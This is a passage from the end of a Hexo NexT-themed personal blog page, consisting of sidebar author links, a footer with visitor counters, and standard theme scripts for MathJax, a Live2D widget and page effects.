        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="https://github.com/ShenTiao" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;ShenTiao" rel="noopener" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
      <span class="links-of-author-item">
        <a href="mailto:584892986@qq.com" title="E-Mail → mailto:584892986@qq.com" rel="noopener" target="_blank"><i class="fa fa-envelope fa-fw"></i>E-Mail</a>
      </span>
  </div>



      </div>

      <iframe frameborder="no" border="0" marginwidth="0" marginheight="0" width=330 height=86 src="//music.163.com/outchain/player?type=2&id=1416875904&auto=0&height=66"></iframe>
      
    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2022</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Sekla</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-chart-area"></i>
    </span>
    <span title="站点总字数">288k</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-coffee"></i>
    </span>
    <span title="站点阅读时长">4:22</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://muse.theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Muse</a> 强力驱动
  </div>

        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    <span class="post-meta-item" id="busuanzi_container_site_uv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-user"></i>
      </span>
      <span class="site-uv" title="总访客量">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item" id="busuanzi_container_site_pv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-eye"></i>
      </span>
      <span class="site-pv" title="总访问量">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>








      </div>
    </footer>
  </div>

  
  <script size="300" alpha="0.6" zIndex="-1" src="/lib/canvas-ribbon/canvas-ribbon.js"></script>
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/muse.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  
      

<script>
  if (typeof MathJax === 'undefined') {
    window.MathJax = {
      loader: {
        source: {
          '[tex]/amsCd': '[tex]/amscd',
          '[tex]/AMScd': '[tex]/amscd'
        }
      },
      tex: {
        inlineMath: {'[+]': [['$', '$']]},
        tags: 'ams'
      },
      options: {
        renderActions: {
          findScript: [10, doc => {
            document.querySelectorAll('script[type^="math/tex"]').forEach(node => {
              const display = !!node.type.match(/; *mode=display/);
              const math = new doc.options.MathItem(node.textContent, doc.inputJax[0], display);
              const text = document.createTextNode('');
              node.parentNode.replaceChild(text, node);
              math.start = {node: text, delim: '', n: 0};
              math.end = {node: text, delim: '', n: 0};
              doc.math.push(math);
            });
          }, '', false],
          insertedScript: [200, () => {
            document.querySelectorAll('mjx-container').forEach(node => {
              let target = node.parentNode;
              if (target.nodeName.toLowerCase() === 'li') {
                target.parentNode.classList.add('has-jax');
              }
            });
          }, '', false]
        }
      }
    };
    (function () {
      var script = document.createElement('script');
      script.src = '//cdn.jsdelivr.net/npm/mathjax@3/es5/tex-mml-chtml.js';
      script.defer = true;
      document.head.appendChild(script);
    })();
  } else {
    MathJax.startup.document.state(0);
    MathJax.texReset();
    MathJax.typeset();
  }
</script>

    

  

<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"assets/","tagMode":false,"debug":false,"model":{"jsonPath":"/live2dw/assets/shizuku.model.json"},"display":{"position":"left","width":250,"height":500},"mobile":{"show":false},"react":{"opacity":0.9},"log":false});</script></body>
</html>

<script type="text/javascript" src="/js/src/love.js"></script>
